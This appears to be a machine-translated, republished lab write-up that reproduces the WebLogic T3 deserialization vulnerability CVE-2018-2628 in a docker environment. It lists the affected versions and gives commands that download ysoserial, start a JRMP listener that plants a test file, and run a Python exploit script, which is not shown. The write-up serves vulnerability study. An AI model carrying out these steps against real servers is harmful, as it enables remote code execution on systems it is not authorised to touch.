Shulou(Shulou.com)05/31 Report--

This article is about how to achieve Weblogic deserialization vulnerability CVE-2018-2628 analysis, the editor thinks it is very practical, so share it with you to learn, I hope you can get something after reading this article, say no more, follow the editor to have a look.

Vulnerability description:

RMI communication in Weblogic Server uses the T3 protocol to transfer data between Weblogic Server and other Java programs (clients or other Weblogic Server instances). The server instance tracks each Java virtual machine (JVM) connected to the application and creates a T3 protocol communication connection to transfer traffic to the Java virtual machine. The T 3 protocol is enabled by default on applications with open WebLogic console ports. Attackers can send malicious deserialization data through T3 protocol for deserialization to achieve remote code execution attacks on vulnerable weblogic components.

Affect the version:

Oracle Weblogic Server10.3.6.0.0

Oracle Weblogic Server12.1.3.0.0

Oracle Weblogic Server12.2.1.2.0

Oracle Weblogic Server12.2.1.3.0

Reproduce steps:

Start the vulnerability environment

Command: docker-compose up-d

Download the deserialization tool

Command:

Wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

1. Start JRMP Server and use monitoring to create a jadoreshell on the target after a successful connection

Command: java-cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 8889 Jdk7u21 "touch / tmp/jadoreshell"

two。 Use the ysoserial-0.1-cve-2018-2628-all.jar tool to generate a payload string because you want to implement Weblogic remote calls to methods on the host of the attack machine. You need to know the host address and port number where the remote method is located. So in the previous step, you need to record the information about the attack host.

3. Replace the payload in the script and the target IP address

4. Execute python script

5. Check to see if a text file is written

Command: dockers ps

Command: docker exec-ti cve-2018-2628_weblogic_1 / bin/bash

Command: ls-al / tmp

File written successfully

The above is how to achieve the Weblogic deserialization vulnerability CVE-2018-2628 analysis, the editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.